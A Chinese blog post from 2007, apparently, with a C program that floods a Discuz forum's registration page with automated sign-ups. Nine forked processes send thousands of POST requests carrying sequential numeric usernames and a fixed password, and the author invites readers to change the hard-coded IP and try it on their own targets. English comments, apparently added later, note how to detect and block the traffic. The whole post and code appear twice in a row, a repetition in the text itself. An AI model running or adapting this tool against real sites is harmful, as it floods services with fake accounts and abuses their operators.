一个简单的暴力注册Discuz论坛帐户的小代码。
时间:2007-04-18 来源:souldemo
昨天偶尔扫描一下,发现老师新做了个BBS. 是asp.net的(Discuz).
便上去注册了几下,发现没有什么验证码或者激活这类的防暴力注册的方法。
便写了这段小代码。可惜速度太慢。
但用于交流目的还是有一定帮助的。
如果谁喜欢,可以修改一下ip地址,拿回去试试。呵呵!不过速度很慢,
因为用不了多久服务器就会通告窗口大小为0。或许应该降低速度,反而
是服务器响应速度越快,注册的就越快。
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <stdarg.h>
#include <errno.h>
#include <limits.h>
void err_quit(const char* fmt, ...);
void err_msg(const char* fmt, ...);
void err_do(const char* fmt, va_list ap);
char *ltoa(long long val, char *buf, unsigned radix);
/**
 * Entry point (argc/argv are unused).
 *
 * Opens a single TCP connection to the hard-coded IPv4 address on port 80,
 * then forks nine children (m = 1..9). Every child writes HTTP POST requests
 * for /register.aspx over that same shared socket; each request differs only
 * in the numeric username taken from the running counter `seq`, all other
 * form fields and headers are constant string literals. The parent never
 * waits for the children; it blocks in pause().
 *
 * Defender's notes: the traffic this produces is trivially fingerprintable --
 * one keep-alive connection carrying thousands of POSTs, an unchanging
 * User-Agent/Referer pair, fixed password and e-mail values, and strictly
 * increasing all-digit usernames. Per-connection or per-IP rate limiting on
 * the registration endpoint, a CAPTCHA, or e-mail activation (the controls the
 * author says were absent) would each defeat this approach.
 **/
int main(int argc, char **argv)
{
int sockfd;
int serverport;
struct sockaddr_in servaddr;
ssize_t len;
socklen_t addrlen;
struct sockaddr *sa;
struct sockaddr_in *sin;
int n;
int m;
pid_t pid;
/** serverport, addrlen, sa and sin are declared but never used **/
sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
if (sockfd < 0)
err_quit("socket failed!\n");
memset(&servaddr, 0, sizeof(struct sockaddr_in));
servaddr.sin_family = AF_INET;
servaddr.sin_port = htons(80);
/** change server's IP here **/
inet_pton(AF_INET, "10.0.191.189", &servaddr.sin_addr);
n = connect(sockfd, (struct sockaddr*)&servaddr, sizeof(struct sockaddr_in));
/** a failed connect is only reported; execution continues regardless **/
if (n < 0)
perror("connect failed!\n");
/** one child per m (1..9); all children share the parent's connected fd **/
for (m = 1; m < 10; ++m) {
if ((pid = fork()) < 0) {
err_quit("fork failed!\n");
}
else if (pid == 0) { /** child **/
int size = 0;
char *str = "POST /register.aspx?agree=1&createuser=1 HTTP/1.1\r\n\
Host: 10.0.191.189\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 2.0.50727; .NET CLR 1.1.4322)\r\nAccept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,\
image/png,*/*;q=0.5\r\nAccept-Language: zh-cn,zh;q=0.5\r\nAccept-Encoding: gzip,deflate\r\nAccept-Charset: gb2312,utf-8;q=0.7,*;q=0.7\r\nKeep-Alive: 300\r\nConnection: keep-alive\r\nReferer: http://10.0.191.189/register.aspx?agree=yes\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length:345";
char *body1 = "\r\n\r\nusername=";
char *body2 = "&password=111111&password2=111111&email=sfsf%40163.com&submit=%E5%88%9B%E5%BB\
%BA%E7%94%A8%E6%88%B7&question=0&answer=&gender=0&nickname=&bday_y=&bday_m=&bd\
ay_d=&location=&msn=&yahoo=&skype=&icq=&qq=&homepage=&bio=&templateid=0&tpp=0&p\
pp=0&newpm=radiobutton&pmsound=1&showemail=1&newsletter=1&invisible=0&signature=\
&sigstatus=1\r\n\r\n";
char seqstr[30];
char sizebuf[4];
char sendbuf[BUFSIZ];
char recvbuf[BUFSIZ*4];
long long int base = 10000;
long long int seq;
int bits =1;
shutdown(sockfd, SHUT_RD);
for (; bits < 10; ++bits) {
for (seq = base *m; seq < base * (m + 1); ++seq) {
/** the request is assembled by length: strncpy() with exact lengths copies
 * no terminator, so sendbuf is only meaningful for the len bytes given to send() **/
len = strlen(str);
strncpy(sendbuf, str, len);
ltoa(seq, seqstr, 10);
#ifdef DEBUG
printf("seq number %s\n", seqstr);
#endif
/** patch the last three characters of the header (the Content-Length value) **/
size = 335 + strlen(seqstr);
ltoa(size, sizebuf, 10);
strncpy(sendbuf+len-3, sizebuf, 3);
#ifdef DEBUG
printf("send : %s\t %d bytes\n", sendbuf, size);
#endif
strncpy(sendbuf+len, body1, strlen(body1));
len += strlen(body1);
strncpy(sendbuf+len, seqstr, strlen(seqstr));
len += strlen(seqstr);
strncpy(sendbuf+len, body2, strlen(body2));
len += strlen(body2);
#ifdef DEBUG
printf("\n%s\n", sendbuf);
#endif
n = send(sockfd, sendbuf, len, 0);
/** you should remove all the incoming data **/
recv(sockfd, recvbuf, BUFSIZ*4, 0);
#ifdef DEBUG
printf("\n%s\n", recvbuf);
// sleep(5);
#endif
}
seq *= 10;
}
}
}
/** parent: sleep until a signal arrives; children are never reaped **/
pause();
}
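/**
 * Format a signed 64-bit integer as a NUL-terminated string in the given base.
 *
 * @param val    value to convert; negative values get a leading '-'.
 * @param buf    caller-supplied output buffer. It must hold the digits, an
 *               optional sign and the terminator: 22 bytes suffice for
 *               radix >= 10, 66 bytes for radix 2.
 * @param radix  numeric base, 2..36; digit values above 9 are emitted as the
 *               lower-case letters 'a'..'z'.
 * @return buf. If radix is outside 2..36, buf is set to "" and returned
 *         (the original code divided by zero for radix 0 and looped forever
 *         for radix 1).
 *
 * The magnitude is taken in unsigned arithmetic instead of negating the signed
 * value, so LLONG_MIN converts correctly instead of overflowing (UB).
 */
char *ltoa(long long val, char *buf, unsigned radix)
{
    static const char digits[] = "0123456789abcdefghijklmnopqrstuvwxyz";
    char *p = buf;
    char *first;
    unsigned long long mag;

    if (radix < 2 || radix > 36) {
        buf[0] = '\0';
        return buf;
    }

    if (val < 0) {
        *p++ = '-';
        /* 0ULL - x wraps modulo 2^64 and yields |val| even for LLONG_MIN. */
        mag = 0ULL - (unsigned long long)val;
    } else {
        mag = (unsigned long long)val;
    }

    /* Emit the least significant digit first ... */
    first = p;
    do {
        *p++ = digits[mag % radix];
        mag /= radix;
    } while (mag > 0);
    *p = '\0';

    /* ... then reverse the digit run in place; the sign, if any, stays put. */
    for (char *last = p - 1; first < last; ++first, --last) {
        char tmp = *first;
        *first = *last;
        *last = tmp;
    }
    return buf;
}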
/**
 * Fatal-error reporter: formats `fmt` plus strerror(errno) via err_do() on
 * stderr, then terminates the process with status 1. Never returns.
 *
 * @param fmt printf-style format string.
 * @param ... arguments for fmt.
 */
void err_quit(const char* fmt, ...)
{
    va_list args;

    va_start(args, fmt);
    err_do(fmt, args);
    va_end(args);

    exit(1);
}
/**
 * Non-fatal variant of err_quit(): formats `fmt` plus strerror(errno) via
 * err_do() on stderr and returns to the caller.
 *
 * @param fmt printf-style format string.
 * @param ... arguments for fmt.
 */
void err_msg(const char* fmt, ...)
{
    va_list args;

    va_start(args, fmt);
    err_do(fmt, args);
    va_end(args);
}
/**
 * Shared back end of err_quit()/err_msg(): writes the formatted message,
 * followed by ": " and the strerror() text for the errno in effect on entry,
 * followed by a newline, to stderr. Output is truncated to BUFSIZ bytes.
 *
 * @param fmt printf-style format string.
 * @param ap  arguments for fmt (consumed).
 */
void err_do(const char* fmt, va_list ap)
{
    const int saved_errno = errno;   /* capture before any library call can clobber it */
    char line[BUFSIZ + 1];
    size_t used;

    vsnprintf(line, BUFSIZ, fmt, ap);
    used = strlen(line);
    snprintf(line + used, BUFSIZ - used, ": %s", strerror(saved_errno));
    /* after snprintf strlen(line) <= BUFSIZ-1, so the extra '\n' plus NUL fit in BUFSIZ+1 */
    strcat(line, "\n");

    fputs(line, stderr);
    fflush(stderr);
}
便上去注册了几下,发现没有什么验证码或者激活这类的防暴力注册的方法。
便写了这段小代码。可惜速度太慢。
但用于交流目的还是有一定帮助的。
如果谁喜欢,可以修改一下ip地址,拿回去试试。呵呵!不过速度很慢,
因为用不了多久服务器就会通告窗口大小为0。或许应该降低速度,反而
是服务器响应速度越快,注册的就越快。
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <stdarg.h>
#include <errno.h>
#include <limits.h>
void err_quit(const char* fmt, ...);
void err_msg(const char* fmt, ...);
void err_do(const char* fmt, va_list ap);
char *ltoa(long long val, char *buf, unsigned radix);
/**
 * Entry point (argc/argv are unused).
 *
 * Opens a single TCP connection to the hard-coded IPv4 address on port 80,
 * then forks nine children (m = 1..9). Every child writes HTTP POST requests
 * for /register.aspx over that same shared socket; each request differs only
 * in the numeric username taken from the running counter `seq`, all other
 * form fields and headers are constant string literals. The parent never
 * waits for the children; it blocks in pause().
 *
 * Defender's notes: the traffic this produces is trivially fingerprintable --
 * one keep-alive connection carrying thousands of POSTs, an unchanging
 * User-Agent/Referer pair, fixed password and e-mail values, and strictly
 * increasing all-digit usernames. Per-connection or per-IP rate limiting on
 * the registration endpoint, a CAPTCHA, or e-mail activation (the controls the
 * author says were absent) would each defeat this approach.
 **/
int main(int argc, char **argv)
{
int sockfd;
int serverport;
struct sockaddr_in servaddr;
ssize_t len;
socklen_t addrlen;
struct sockaddr *sa;
struct sockaddr_in *sin;
int n;
int m;
pid_t pid;
/** serverport, addrlen, sa and sin are declared but never used **/
sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
if (sockfd < 0)
err_quit("socket failed!\n");
memset(&servaddr, 0, sizeof(struct sockaddr_in));
servaddr.sin_family = AF_INET;
servaddr.sin_port = htons(80);
/** change server's IP here **/
inet_pton(AF_INET, "10.0.191.189", &servaddr.sin_addr);
n = connect(sockfd, (struct sockaddr*)&servaddr, sizeof(struct sockaddr_in));
/** a failed connect is only reported; execution continues regardless **/
if (n < 0)
perror("connect failed!\n");
/** one child per m (1..9); all children share the parent's connected fd **/
for (m = 1; m < 10; ++m) {
if ((pid = fork()) < 0) {
err_quit("fork failed!\n");
}
else if (pid == 0) { /** child **/
int size = 0;
char *str = "POST /register.aspx?agree=1&createuser=1 HTTP/1.1\r\n\
Host: 10.0.191.189\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 2.0.50727; .NET CLR 1.1.4322)\r\nAccept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,\
image/png,*/*;q=0.5\r\nAccept-Language: zh-cn,zh;q=0.5\r\nAccept-Encoding: gzip,deflate\r\nAccept-Charset: gb2312,utf-8;q=0.7,*;q=0.7\r\nKeep-Alive: 300\r\nConnection: keep-alive\r\nReferer: http://10.0.191.189/register.aspx?agree=yes\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length:345";
char *body1 = "\r\n\r\nusername=";
char *body2 = "&password=111111&password2=111111&email=sfsf%40163.com&submit=%E5%88%9B%E5%BB\
%BA%E7%94%A8%E6%88%B7&question=0&answer=&gender=0&nickname=&bday_y=&bday_m=&bd\
ay_d=&location=&msn=&yahoo=&skype=&icq=&qq=&homepage=&bio=&templateid=0&tpp=0&p\
pp=0&newpm=radiobutton&pmsound=1&showemail=1&newsletter=1&invisible=0&signature=\
&sigstatus=1\r\n\r\n";
char seqstr[30];
char sizebuf[4];
char sendbuf[BUFSIZ];
char recvbuf[BUFSIZ*4];
long long int base = 10000;
long long int seq;
int bits =1;
shutdown(sockfd, SHUT_RD);
for (; bits < 10; ++bits) {
for (seq = base *m; seq < base * (m + 1); ++seq) {
/** the request is assembled by length: strncpy() with exact lengths copies
 * no terminator, so sendbuf is only meaningful for the len bytes given to send() **/
len = strlen(str);
strncpy(sendbuf, str, len);
ltoa(seq, seqstr, 10);
#ifdef DEBUG
printf("seq number %s\n", seqstr);
#endif
/** patch the last three characters of the header (the Content-Length value) **/
size = 335 + strlen(seqstr);
ltoa(size, sizebuf, 10);
strncpy(sendbuf+len-3, sizebuf, 3);
#ifdef DEBUG
printf("send : %s\t %d bytes\n", sendbuf, size);
#endif
strncpy(sendbuf+len, body1, strlen(body1));
len += strlen(body1);
strncpy(sendbuf+len, seqstr, strlen(seqstr));
len += strlen(seqstr);
strncpy(sendbuf+len, body2, strlen(body2));
len += strlen(body2);
#ifdef DEBUG
printf("\n%s\n", sendbuf);
#endif
n = send(sockfd, sendbuf, len, 0);
/** you should remove all the incoming data **/
recv(sockfd, recvbuf, BUFSIZ*4, 0);
#ifdef DEBUG
printf("\n%s\n", recvbuf);
// sleep(5);
#endif
}
seq *= 10;
}
}
}
/** parent: sleep until a signal arrives; children are never reaped **/
pause();
}
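/**
 * Format a signed 64-bit integer as a NUL-terminated string in the given base.
 *
 * @param val    value to convert; negative values get a leading '-'.
 * @param buf    caller-supplied output buffer. It must hold the digits, an
 *               optional sign and the terminator: 22 bytes suffice for
 *               radix >= 10, 66 bytes for radix 2.
 * @param radix  numeric base, 2..36; digit values above 9 are emitted as the
 *               lower-case letters 'a'..'z'.
 * @return buf. If radix is outside 2..36, buf is set to "" and returned
 *         (the original code divided by zero for radix 0 and looped forever
 *         for radix 1).
 *
 * The magnitude is taken in unsigned arithmetic instead of negating the signed
 * value, so LLONG_MIN converts correctly instead of overflowing (UB).
 */
char *ltoa(long long val, char *buf, unsigned radix)
{
    static const char digits[] = "0123456789abcdefghijklmnopqrstuvwxyz";
    char *p = buf;
    char *first;
    unsigned long long mag;

    if (radix < 2 || radix > 36) {
        buf[0] = '\0';
        return buf;
    }

    if (val < 0) {
        *p++ = '-';
        /* 0ULL - x wraps modulo 2^64 and yields |val| even for LLONG_MIN. */
        mag = 0ULL - (unsigned long long)val;
    } else {
        mag = (unsigned long long)val;
    }

    /* Emit the least significant digit first ... */
    first = p;
    do {
        *p++ = digits[mag % radix];
        mag /= radix;
    } while (mag > 0);
    *p = '\0';

    /* ... then reverse the digit run in place; the sign, if any, stays put. */
    for (char *last = p - 1; first < last; ++first, --last) {
        char tmp = *first;
        *first = *last;
        *last = tmp;
    }
    return buf;
}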
/**
 * Fatal-error reporter: formats `fmt` plus strerror(errno) via err_do() on
 * stderr, then terminates the process with status 1. Never returns.
 *
 * @param fmt printf-style format string.
 * @param ... arguments for fmt.
 */
void err_quit(const char* fmt, ...)
{
    va_list args;

    va_start(args, fmt);
    err_do(fmt, args);
    va_end(args);

    exit(1);
}
/**
 * Non-fatal variant of err_quit(): formats `fmt` plus strerror(errno) via
 * err_do() on stderr and returns to the caller.
 *
 * @param fmt printf-style format string.
 * @param ... arguments for fmt.
 */
void err_msg(const char* fmt, ...)
{
    va_list args;

    va_start(args, fmt);
    err_do(fmt, args);
    va_end(args);
}
/**
 * Shared back end of err_quit()/err_msg(): writes the formatted message,
 * followed by ": " and the strerror() text for the errno in effect on entry,
 * followed by a newline, to stderr. Output is truncated to BUFSIZ bytes.
 *
 * @param fmt printf-style format string.
 * @param ap  arguments for fmt (consumed).
 */
void err_do(const char* fmt, va_list ap)
{
    const int saved_errno = errno;   /* capture before any library call can clobber it */
    char line[BUFSIZ + 1];
    size_t used;

    vsnprintf(line, BUFSIZ, fmt, ap);
    used = strlen(line);
    snprintf(line + used, BUFSIZ - used, ": %s", strerror(saved_errno));
    /* after snprintf strlen(line) <= BUFSIZ-1, so the extra '\n' plus NUL fit in BUFSIZ+1 */
    strcat(line, "\n");

    fputs(line, stderr);
    fflush(stderr);
}